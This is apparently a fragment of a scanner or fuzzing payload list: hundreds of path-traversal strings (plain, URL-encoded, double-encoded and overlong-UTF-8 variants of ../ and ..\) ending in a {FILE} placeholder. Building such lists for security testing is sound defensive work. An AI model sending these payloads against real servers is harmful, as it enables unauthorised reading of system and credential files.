"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + 